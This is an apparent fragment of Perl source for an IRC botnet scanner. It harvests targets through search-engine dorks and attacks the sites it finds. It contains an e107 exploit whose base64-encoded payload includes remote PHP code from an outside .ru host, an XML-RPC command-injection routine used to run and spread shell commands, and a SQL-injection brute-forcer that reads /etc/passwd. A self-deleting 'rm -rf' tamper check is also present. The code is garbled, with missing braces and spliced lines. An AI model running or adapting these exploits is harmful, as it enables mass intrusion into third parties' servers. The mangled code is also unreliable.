sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
my $cmd = "echo(base64_decode(\"aXNmYW4=\").php_uname().base64_decode(\"aXNmYW4=\"));include(base64_decode(\"aHR0cDovL3d3dy5oYXlrb3dhcmV6LnJ1L2ltYWdlcy9waHAudHh0/Pw==\"));include(base64_decode(\"aHR0cDovL3d3dy5oYXlrb3dhcmV6LnJ1L2ltYWdlcy9waHAudHh0/Pw==\"));";
my $ua = LWP::UserAgent->new or die;
$ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
my $xpl = "http://".$e107target."/contact.php";
$xpl =~ s/\/\/contact.php/\/contact.php/g;
my $req = HTTP::Request->new(POST => $xpl);
my $res = $ua->request($req);
my $cont = $res->content;
if ($cont =~ /Voo(.*)Doo/) {
my $uname = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15)( 2$xpl 15) 14 $uname ");
sub enc()
my $md5_hash = $1;
my $md5_generated = md5_hex($md5_hash);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3md5 Encode 15) 2 $md5_generated ");
sub dec()
my $md5 = $1;
my $crac = 'http://md5.noisette.ch/md5.php?hash='.$md5;
my $found = getcontent($crac);
if ($found =~ /<\/string>/)
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3md5 Decode 15) 2 $1 ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3md5 Decode 15) 2 $1 ");
sub xmlcek {
my $xmltgt = $_[0];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "";
$exploit .= "test.method ";
$exploit .= "',''));";
$exploit .= "echo'j13mb0t';echo`uname -a`;echo'j13mb0t';exit;/* ";
my $response = $userAgent->request(POST $xmltgt, Content_Type => 'text/xml', Content => $exploit);
if ($response->content =~ /j13mb0t(.*)j13mb0t/s) {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15)( 2$xmltgt 15) 14 $os ");
sendraw($IRC_cur_socket, "PRIVMSG loader : 15( 4@ 3XML 15)( 2$xmltgt 15) 14 $os ");
sub xmlxspread() {
my $xmltargt = $_[0];
my $xmlsprd = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "";
$exploit .= "test.method ";
$exploit .= "',''));";
$exploit .= "echo'j13m';echo`".$xmlsprd."`;echo'b0T';exit;/* ";
my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
sub getcontent() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;
sub lfiexploit() {
my $url = $_[0];
my $rce = $_[1];
my $agent = "";
my $ua = LWP::UserAgent->new(agent => $agent);
my $req = HTTP::Request->new(GET => $url);
my $response = $ua->request($req);
return $response->content;
sub google(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=100){ my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$b); my $Res=query($Go); while ($Res =~ m/\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
return @lst;
sub SIGN() {
if (($powered !~ /B/)||($mail !~ /oe/)) {
print "\nLamer!!! Bodoh ToloL Oon !!! Udah Gak Usah diRubah Lagi!!!\n\n";
exec("rm -rf $0 && pkill perl");
sub alltheweb() {
my @lst;
my $key = $_[0];
my $b = 0;
my $pg = 0;
for ($b=0; $b<=1000; $b+=100) { my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$b); my $Res = query($all); while ( $Res =~ m/http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub uol() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) { my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$b); my $Res = query($UoL); while ( $Res =~ m/\"]*)/g ) {
my $k = $1;
if ( $k !~ /busca|uol|yahoo/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub Bing() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) { my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$b."&FORM=PERE"); my $Res = query($bing); while ( $Res =~ m/\"]*)\//g ) {
if ( $1 !~ /msn|live|bing/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub altavista(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10){ my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); my $Res=query($AlT); while ($Res=~m/(.+?)\//g){
if ($1 !~ /altavista/){
my $k=$1;
$k=~s/new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page = "@r";
return $page;
sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
return $dork;
sub calculate {
my @calculate = ();
my %visti = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visti{$element}++;
push @calculate, $element;
return @calculate;
sub sqlbrute() {
my $site=$_[0];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
if ($column == 0)
$inyection = '';
$union = '';
if($response =~ /loginpwnz/)
$column ++;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) 14 $sql ");
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2SCHEMA 15) 14 $sql ");
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2USER 15) 14 $sql ");
while ($loadcont < $column-1)
$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
if($response =~ /root:x:/)
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2Load File 15) 14 $sql ");
foreach $tabla(@tabele)
$response=get($sql)or die("[-] Impossible to get tables\n");
if($response =~ /loginpwnz/)
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2Tabel 15) 14 $sql ");
sub tabelka() {
my $site=$_[0];
my $tabla=$_[1];
my $cfin.="--";
my $cmn.= "+";
foreach $columna(@kolumny)
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) ( 2SQLi Vuln 15) 14 $site 15( 2Kolom 15) 14 $columna 15( 2Tabel 15) 14 $tabla ");
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
sub join {
sendraw("JOIN $_[0]");
sub part {
sendraw("PART $_[0]");
sub quit {
sendraw("QUIT $_[0]");
